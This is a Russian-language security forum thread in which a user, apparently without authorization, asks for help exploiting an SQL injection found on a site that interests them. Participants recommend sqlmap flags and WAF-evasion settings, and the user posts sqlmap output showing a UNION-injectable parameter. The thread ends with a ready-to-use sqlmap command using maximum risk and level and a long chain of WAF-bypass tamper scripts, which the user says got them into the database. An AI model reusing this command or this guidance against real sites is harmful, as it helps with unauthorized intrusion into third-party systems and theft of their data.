• 🔥 Бесплатный курс от Академии Кодебай: «Анализ защищенности веб-приложений»

    🛡 Научитесь находить и использовать уязвимости веб-приложений.
    🧠 Изучите SQLi, XSS, CSRF, IDOR и другие типовые атаки на практике.
    🧪 Погрузитесь в реальные лаборатории и взломайте свой первый сайт!
    🚀 Подходит новичкам — никаких сложных предварительных знаний не требуется.

    Доступ открыт прямо сейчас Записаться бесплатно

Помощь с эксплутацией SQL инъекции

  • Автор темы Автор темы N1GGA
  • Дата начала Дата начала
  • Теги Теги
    sql

N1GGA

Codeby Team
Администратор
16.07.2018
394
369
Шалом, всем форумчанам. На одном, интересном для меня сайте нашел несколько уязвимостей SQL. Точнее, уязвим один и тот же параметр. Через ORDER BY я могу узнать количество столбцов, но не в ручную, не с помощью sqlmap, я не могу получить другую инфу. Может кто помочь?)
 
Шалом. А sqlmap видит инъекцию?
Если да, то вы пробовали его запустить с параметрами --hex или --no-cast? Иногда это помогает
 
Шалом. А sqlmap видит инъекцию?
Если да, то вы пробовали его запустить с параметрами --hex или --no-cast? Иногда это помогает
Sqlmap вроде видит уязвимость
Код:
[20:14:48] [INFO] heuristic (basic) test shows that GET parameter 'product_id' might be injectable (possible DBMS: 'MySQL')
[20:14:51] [INFO] heuristic (XSS) test shows that GET parameter 'product_id' might be vulnerable to cross-site scripting (XSS) attacks
Пробовал обе варианта, тот же результат
Код:
[20:16:39] [INFO] target URL appears to have 3 columns in query
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[20:17:21] [INFO] target URL appears to be UNION injectable with 3 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
 
Если вы про аргумент —dbms, то пытался и без нее. Так же.
ХЗ, так гадать можно долго (ибо это как методом "научного тыка"). Изначально я предположил что у вас не экранирована ссылка, но с у вас всё как и сам бы писал. Самому бы посмотреть, может что и пришло бы на ум.
В любом случае вопрос заинтересовал, если вдруг найдется решение обязательно напишите, что было не так.
Если вдруг возникнут мысли, тоже отпишу.
 
ХЗ, так гадать можно долго (ибо это как методом "научного тыка"). Изначально я предположил что у вас не экранирована ссылка, но с у вас всё как и сам бы писал. Самому бы посмотреть, может что и пришло бы на ум.
В любом случае вопрос заинтересовал, если вдруг найдется решение обязательно напишите, что было не так.
Если вдруг возникнут мысли, тоже отпишу.
Хорошо.
 
Еще я бы посоветовал вседа использовать --random-agent или указывать user-agent вручную. Может быть срабатывает WAF.
Покажите полный вывод sqlmap после этой части:
[20:16:39] [INFO] target URL appears to have 3 columns in query
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[20:17:21] [INFO] target URL appears to be UNION injectable with 3 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
а то и правда гадаем на кофейной гуще.
Посмотрите эту статью обходим WAF с помощью sqlmap, может там то, что вам нужно.
 
Последнее редактирование:
бывает такое, руками крутится не до конца, а sqlmap раскручивает
 
Еще я бы посоветовал вседа использовать --random-agent или указывать user-agent вручную. Может быть срабатывает WAF.
Покажите полный вывод sqlmap после этой части:

а то и правда гадаем на кофейной гуще.
Посмотрите эту статью обходим WAF с помощью sqlmap, может там то, что вам нужно.
Там просто WAF на 99%. Дали ссылку, уже посмотрел.
 
Спасибо всем большое за помощь, особенно Marlen. Получилось все таки добраться до бд.
Код:
sqlmap -u ''ваша ссылка" --risk=3 --level=5 tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
 
  • Нравится
Реакции: Marlen, centr и larchik
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

Похожие темы